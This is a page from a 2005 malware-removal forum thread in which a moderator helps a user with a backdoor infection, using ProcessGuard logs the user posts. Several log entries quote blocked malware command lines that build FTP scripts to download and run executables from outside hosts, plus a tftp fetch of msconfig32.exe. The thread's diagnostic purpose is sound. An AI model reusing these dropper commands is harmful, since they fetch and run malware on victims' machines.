Jump to content

Welcome to Geeks to Go - Register now for FREE

Need help with your computer or device? Want to learn new tech skills? You're in the right place!
Geeks to Go is a friendly community of tech experts who can solve any problem you have. Just create a free account and post your question. Our volunteers will reply quickly and guide you through the steps. Don't let tech troubles stop you. Join Geeks to Go now and get the support you need!

How it Works Create Account
Photo

help i have trojan horse collected.5.L [RESOLVED]

Started by duglartis , Jun 09 2005 03:25 AM

  • This topic is locked This topic is locked

#166
duglartis
Posted 04 September 2005 - 09:02 PM

duglartis

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 159 posts
sorry it cut off the bottom part of the log which had the nasties will repost
Cheers
  • 0

Advertisements

#167
Metallica
Posted 05 September 2005 - 11:38 AM

Metallica

    Spyware Veteran

  • GeekU Moderator
  • 33,101 posts
OK :tazz:
  • 0

#168
duglartis
Posted 05 September 2005 - 01:20 PM

duglartis

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 159 posts
anything suspect in the file i uploaded for you
thanks for your help
Cheers
  • 0

#169
Metallica
Posted 05 September 2005 - 01:27 PM

Metallica

    Spyware Veteran

  • GeekU Moderator
  • 33,101 posts
Oh sorry. I replied at TheSpykiller to that.

It's too small to be anything bad by itself. It might be a file with data for another program, so I really don't dare touch it because we don't know what it belongs to.

Regards,
  • 0

#170
duglartis
Posted 05 September 2005 - 11:33 PM

duglartis

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 159 posts
heres the pg log that was cut off
Sun 04 - 10:30:54 [EXECUTION] "c:\windows\system32\cmd.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\lsass.exe" [488]
[EXECUTION] Commandline - [ cmd /c echo open phr3akftp.darksensui.info 612 >appmr.dll &echo user phr klopklop >>appmr.dll &echo binary >>appmr.dll &echo get >>appmr.dll &echo phr.exe >>appmr.dll &echo phr.exe >>appmr.dll &echo bye >>appmr.dll &ftp.exe -n -s:appmr.dll &del appmr.dll &phr.exe
]
Sun 04 - 10:57:39 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds50e8672d206bf04db2029156fba5fb8f ]
Sun 04 - 10:57:39 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsb0814a935d502144943928e5615927a6 ]
Sun 04 - 11:27:39 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdsa8d154f7786f8549891f3a1af235407c ]
Sun 04 - 11:27:39 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susdse85f60b714654d438d4f4b49768d372b ]
Sun 04 - 11:57:39 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds54135e64de865c409179d05c2bb984ec ]
Sun 04 - 11:57:39 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2a4]susds9941c72fe6331d4b844f8a3063039a39 ]
Sun 04 - 12:09:24 [EXECUTION] "c:\program files\outlook express\msimn.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\program files\outlook express\msimn.exe" ]
Sun 04 - 12:09:27 [EXECUTION] "c:\program files\messenger\msmsgs.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [652]
[EXECUTION] Commandline - [ "c:\program files\messenger\msmsgs.exe" -embedding ]
Sun 04 - 12:13:11 [EXECUTION] "c:\program files\adobe\acrobat 6.0\reader\acrord32.exe" was allowed to run
[EXECUTION] Started by "c:\program files\outlook express\msimn.exe" [792]
[EXECUTION] Commandline - [ "c:\program files\adobe\acrobat 6.0\reader\acrord32.exe" "c:\documents and settings\dug and tania\local settings\temporary internet files\content.ie5\9ma37irm\statement.pdf" ]
Sun 04 - 12:13:48 [EXECUTION] "c:\program files\mozilla firefox\firefox.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1008]
[EXECUTION] Commandline - [ "c:\program files\mozilla firefox\firefox.exe" ]
Sun 04 - 12:14:40 [EXECUTION] "c:\windows\system32\logonui.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\winlogon.exe" [432]
[EXECUTION] Commandline - [ logonui.exe /status /shutdown ]

and again here
Sun 04 - 12:52:33 [EXECUTION] "c:\windows\system32\cmd.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\lsass.exe" [488]
[EXECUTION] Commandline - [ cmd ]
Sun 04 - 12:58:59 [EXECUTION] "c:\windows\system32\cmd.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\lsass.exe" [488]
[EXECUTION] Commandline - [ cmd /c echo open phr3akftp.darksensui.info 612 >appmr.dll &echo user phr klopklop >>appmr.dll &echo binary >>appmr.dll &echo get >>appmr.dll &echo phr.exe >>appmr.dll &echo phr.exe >>appmr.dll &echo bye >>appmr.dll &ftp.exe -n -s:appmr.dll &del appmr.dll &phr.exe
]
  • 0

#171
Metallica
Posted 06 September 2005 - 12:12 PM

Metallica

    Spyware Veteran

  • GeekU Moderator
  • 33,101 posts
Can you see that it looks to be triggered by lsass.exe everytime?

That file is usually triggered when you try to login somewhere.

Can you upload your copy of c:\windows\system32\lsass.exe to the same thread at TheSpykiller
I'd like to compare it to a certified clean one.

Also if you have any idea what you were doing when the process started: connecting to the internet, a network or visiting a certain site, anythin, please let me know.

And if you can find appmr.dll, upload that as well.

Regards,
  • 0

#172
duglartis
Posted 06 September 2005 - 04:56 PM

duglartis

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 159 posts
hi there will do when i am back at computer i am away for work until the 13th September
thanks for your help
  • 0

#173
Metallica
Posted 07 September 2005 - 11:38 AM

Metallica

    Spyware Veteran

  • GeekU Moderator
  • 33,101 posts
OK. Have a safe trip. :tazz:
  • 0

#174
duglartis
Posted 13 September 2005 - 02:12 AM

duglartis

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 159 posts
Hi i am back and have uploaded file as requested
thanks for your help
http://www.thespykil...php?topic=664.0
  • 0

#175
Metallica
Posted 13 September 2005 - 12:18 PM

Metallica

    Spyware Veteran

  • GeekU Moderator
  • 33,101 posts
Hmm looks like the "real thing"

Can you try this for me?

Allow wuauclt.exe in ProcessGuard
We did have ftp.exe blocked, right?

Then post a new Process Guard log after c:\windows\system32\wuauclt.exe" /runstoreascomserver local has run

Regards,
  • 0

Advertisements

#176
duglartis
Posted 14 September 2005 - 01:47 AM

duglartis

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 159 posts
Hi there
FTP.exe is not in the process gaurd system but has popped up as a rouge programme i have always disallowed
thanks for your help
cheers
  • 0

#177
duglartis
Posted 14 September 2005 - 03:39 AM

duglartis

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 159 posts
heres the log file

---Process Guard Log Started---
Wed 14 - 19:35:59 [EXECUTION] "c:\windows\system32\tcpsvcs.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [520]
[EXECUTION] Commandline - [ c:\windows\system32\tcpsvcs.exe ]
Wed 14 - 19:36:00 [EXECUTION] "c:\windows\system32\svchost.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [520]
[EXECUTION] Commandline - [ c:\windows\system32\svchost.exe -k imgsvc ]
Wed 14 - 19:36:01 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\nvsvc32.exe" [1568]
[EXECUTION] Commandline - [ rundll32.exe nvcpl.dll,resetview ]
Wed 14 - 19:36:02 [EXECUTION] "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1236]
[EXECUTION] Commandline - [ "c:\windows\system32\spool\drivers\w32x86\3\hpztsb07.exe" ]
Wed 14 - 19:36:03 [EXECUTION] "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1236]
[EXECUTION] Commandline - [ "c:\program files\roxio\easy cd creator 5\directcd\directcd.exe" ]
Wed 14 - 19:36:03 [EXECUTION] "c:\windows\system32\nerocheck.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1236]
[EXECUTION] Commandline - [ "c:\windows\system32\nerocheck.exe" ]
Wed 14 - 19:36:04 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1236]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" c:\windows\system32\nvcpl.dll,nvstartup ]
Wed 14 - 19:36:04 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1236]
[EXECUTION] Commandline - [ "c:\windows\system32\dumprep.exe" 0 -k ]
Wed 14 - 19:36:04 [EXECUTION] "c:\windows\system32\dumprep.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [1844]
[EXECUTION] Commandline - [ c:\windows\system32\dumprep.exe 0 -kg ]
Wed 14 - 19:36:05 [EXECUTION] "c:\program files\quicktime\qttask.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1236]
[EXECUTION] Commandline - [ "c:\program files\quicktime\qttask.exe" -atboottime ]
Wed 14 - 19:36:05 [EXECUTION] "c:\program files\grisoft\avg free\avgcc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1236]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgcc.exe" /startup ]
Wed 14 - 19:36:06 [EXECUTION] "c:\program files\grisoft\avg free\avgemc.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1236]
[EXECUTION] Commandline - [ "c:\progra~1\grisoft\avgfre~1\avgemc.exe" ]
Wed 14 - 19:36:06 [EXECUTION] "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1236]
[EXECUTION] Commandline - [ "c:\documents and settings\dug and tania\my documents\downloads\regprot.exe" /start ]
Wed 14 - 19:36:07 [EXECUTION] "c:\windows\system32\nwiz.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1236]
[EXECUTION] Commandline - [ "c:\windows\system32\nwiz.exe" /install ]
Wed 14 - 19:36:07 [EXECUTION] "c:\program files\processguard\pgaccount.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1236]
[EXECUTION] Commandline - [ "c:\program files\processguard\pgaccount.exe" ]
Wed 14 - 19:36:31 [EXECUTION] "c:\program files\common files\real\update_ob\realsched.exe" was blocked from running
[EXECUTION] Started by "c:\windows\explorer.exe" [1236]
[EXECUTION] Commandline - [ "c:\program files\common files\real\update_ob\realsched.exe" -osboot ]
Wed 14 - 19:36:31 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [520]
[EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]
Wed 14 - 19:36:31 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1236]
[EXECUTION] Commandline - [ "c:\windows\system32\rundll32.exe" nview.dll,nviewloadhook ]
Wed 14 - 19:36:32 [EXECUTION] "c:\program files\processguard\procguard.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1236]
[EXECUTION] Commandline - [ "c:\program files\processguard\procguard.exe" -minimize ]
Wed 14 - 19:36:32 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "Unknown Process" [1028]
[EXECUTION] Commandline - [ rundll32 nview.dll,nviewinitialize ]
Wed 14 - 19:36:32 [EXECUTION] "c:\program files\microsoft office\office\osa9.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1236]
[EXECUTION] Commandline - [ "c:\program files\microsoft office\office\osa9.exe" -b -l ]
Wed 14 - 19:36:53 [EXECUTION] "c:\program files\ulead systems\ulead videostudio 7\vstudio.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1236]
[EXECUTION] Commandline - [ "c:\program files\ulead systems\ulead videostudio 7\vstudio.exe" ]
Wed 14 - 19:36:53 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [724]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2d4]susdsec620a944f6240409d9b334efc02ebbc ]
Wed 14 - 19:36:53 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [724]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2d4]susdsf2de07973b90a84eb84034d0e65fffc3 ]
Wed 14 - 19:36:53 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [724]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2d4]susdsbf5d47532d983345b4a5e6156b991c7c ]
Wed 14 - 19:36:53 [EXECUTION] "c:\windows\system32\wuauclt.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [724]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2d4]susdsb03d3bd365caab4a87134d2fd16194bd ]
Wed 14 - 19:41:08 [EXECUTION] "c:\windows\system32\cmd.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\lsass.exe" [532]
[EXECUTION] Commandline - [ cmd /c echo open redirect.toruncity.biz 5192 >socket64.dll &echo user http http >>socket64.dll &echo binary >>socket64.dll &echo get >>socket64.dll &echo o.exe >>socket64.dll &echo o.exe >>socket64.dll &echo bye >>socket64.dll &ftp.exe -n -s:socket64.dll &del socket64.dll &o.exe
]
Wed 14 - 19:42:32 [EXECUTION] "c:\program files\mozilla firefox\firefox.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1236]
[EXECUTION] Commandline - [ "c:\program files\mozilla firefox\firefox.exe" ]
Wed 14 - 20:00:21 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [724]
[EXECUTION] Commandline - [ rundll32.exe shell32.dll,activate_rundll ]
Wed 14 - 20:00:23 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [520]
[EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]
Wed 14 - 20:01:02 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [724]
[EXECUTION] Commandline - [ rundll32.exe shell32.dll,activate_rundll ]
Wed 14 - 20:01:02 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [520]
[EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]
Wed 14 - 20:05:53 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [724]
[EXECUTION] Commandline - [ rundll32.exe shell32.dll,activate_rundll ]
Wed 14 - 20:05:53 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [520]
[EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]
Wed 14 - 20:06:17 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [724]
[EXECUTION] Commandline - [ rundll32.exe shell32.dll,activate_rundll ]
Wed 14 - 20:06:17 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [520]
[EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]
Wed 14 - 20:06:54 [EXECUTION] "c:\windows\system32\wuauclt.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [724]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2d4]susds0f587cfc28660b4aa1183ceaaf8d419c ]
Wed 14 - 20:06:55 [EXECUTION] "c:\windows\system32\wuauclt.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [724]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2d4]susds3bb3e92efe24164ea28b8c9cfceb3c6a ]
Wed 14 - 20:12:34 [EXECUTION] "c:\program files\cyberlink\powerdvd\powerdvd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1236]
[EXECUTION] Commandline - [ "c:\program files\cyberlink\powerdvd\powerdvd.exe" ]
Wed 14 - 20:14:22 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [724]
[EXECUTION] Commandline - [ rundll32.exe shell32.dll,activate_rundll ]
Wed 14 - 20:14:22 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [520]
[EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]
Wed 14 - 20:14:45 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [724]
[EXECUTION] Commandline - [ rundll32.exe shell32.dll,activate_rundll ]
Wed 14 - 20:14:45 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [520]
[EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]
Wed 14 - 20:14:57 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [724]
[EXECUTION] Commandline - [ rundll32.exe shell32.dll,activate_rundll ]
Wed 14 - 20:14:57 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [520]
[EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]
Wed 14 - 20:15:19 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [724]
[EXECUTION] Commandline - [ rundll32.exe shell32.dll,activate_rundll ]
Wed 14 - 20:15:19 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [520]
[EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]
Wed 14 - 20:19:48 [EXECUTION] "c:\windows\system32\rasautou.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [724]
[EXECUTION] Commandline - [ rasautou -r -f "c:\windows\system32\ras\rasphone.pbk" -e "netaccess" ]
Wed 14 - 20:21:22 [EXECUTION] "c:\program files\mozilla firefox\firefox.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1236]
[EXECUTION] Commandline - [ "c:\program files\mozilla firefox\firefox.exe" ]
Wed 14 - 20:33:00 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [724]
[EXECUTION] Commandline - [ rundll32.exe shell32.dll,activate_rundll ]
Wed 14 - 20:33:00 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [520]
[EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]
Wed 14 - 20:33:21 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [724]
[EXECUTION] Commandline - [ rundll32.exe shell32.dll,activate_rundll ]
Wed 14 - 20:33:21 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [520]
[EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]
Wed 14 - 20:36:56 [EXECUTION] "c:\windows\system32\wuauclt.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [724]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2d4]susdscf7225d19dff6f41b3ad7ebb716e6360 ]
Wed 14 - 20:36:57 [EXECUTION] "c:\windows\system32\wuauclt.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [724]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2d4]susdse61351a4e242bc42ae206e71151f741b ]
Wed 14 - 20:37:07 [EXECUTION] "c:\program files\cyberlink\powerdvd\powerdvd.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1236]
[EXECUTION] Commandline - [ "c:\program files\cyberlink\powerdvd\powerdvd.exe" ]
Wed 14 - 20:37:42 [EXECUTION] "c:\windows\system32\rundll32.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [724]
[EXECUTION] Commandline - [ rundll32.exe shell32.dll,activate_rundll ]
Wed 14 - 20:37:42 [EXECUTION] "c:\windows\system32\imapi.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\services.exe" [520]
[EXECUTION] Commandline - [ c:\windows\system32\imapi.exe ]
Wed 14 - 21:06:58 [EXECUTION] "c:\windows\system32\wuauclt.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [724]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2d4]susdsd56e52c72999b04abb4bcd3aa657b3d7 ]
Wed 14 - 21:06:58 [EXECUTION] "c:\windows\system32\wuauclt.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [724]
[EXECUTION] Commandline - [ "c:\windows\system32\wuauclt.exe" /runstoreascomserver local\[2d4]susdsed9141a0f8dc9049a00fc12359e88003 ]
Wed 14 - 21:32:05 [EXECUTION] "c:\windows\system32\logonui.exe" was allowed to run
[EXECUTION] Started by "c:\windows\system32\winlogon.exe" [476]
[EXECUTION] Commandline - [ logonui.exe /status /shutdown ]

cWed 14 - 21:35:31 [EXECUTION] "c:\windows\system32\notepad.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ c:\windows\system32\notepad.exe c:\program files\processguard\logs\pglog_09_2005.txt ]
Wed 14 - 21:35:51 [EXECUTION] "c:\program files\mozilla firefox\firefox.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ "c:\program files\mozilla firefox\firefox.exe" ]
Wed 14 - 21:36:06 [EXECUTION] "c:\windows\system32\notepad.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ c:\windows\system32\notepad.exe c:\program files\processguard\logs\pglog_09_2005.txt ]
Wed 14 - 21:36:28 [EXECUTION] "c:\windows\system32\cmd.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\lsass.exe" [488]
[EXECUTION] Commandline - [ cmd ]
Wed 14 - 21:37:08 [EXECUTION] "c:\windows\system32\tftp.exe" was blocked from running
[EXECUTION] Started by "c:\windows\system32\svchost.exe" [676]
[EXECUTION] Commandline - [ tftp.exe -i 202.124.147.75 get msconfig32.exe ]
Wed 14 - 21:37:21 [EXECUTION] "c:\windows\system32\notepad.exe" was allowed to run
[EXECUTION] Started by "c:\windows\explorer.exe" [1012]
[EXECUTION] Commandline - [ c:\windows\system32\notepad.exe c:\program files\processguard\logs\pglog_09_2005.txt ]
  • 0

#178
Metallica
Posted 14 September 2005 - 12:20 PM

Metallica

    Spyware Veteran

  • GeekU Moderator
  • 33,101 posts
I'm having an expert trojan fighter have a look at this.

His time is very limited, but I'm hoping he can spot something I am missing.

Can you check if msconfig32.exe is present on your system.
Probably not, but if it is delete it.
Backdoor.Win32.Codbot.ah

Regards,
  • 0

#179
duglartis
Posted 18 September 2005 - 01:17 PM

duglartis

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 159 posts
couldnt find anything
Cheers
  • 0

#180
Metallica
Posted 19 September 2005 - 11:30 AM

Metallica

    Spyware Veteran

  • GeekU Moderator
  • 33,101 posts
Locate the Rasphone.pbk file in the c:\Documents and Settings\All Users\Application Data\Microsoft\Network\Connections\Pbk folder
Rightclick the file to open in notepad and post the content of the file please.

Regards,
  • 0
Back to Virus, Spyware, Malware Removal · Next Unread Topic →




Similar Topics

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

  1. Geeks to Go Community
  2. Security
  3. Virus, Spyware, Malware Removal

As Featured On:

Microsoft Yahoo BBC MSN PC Magazine Washington Post HP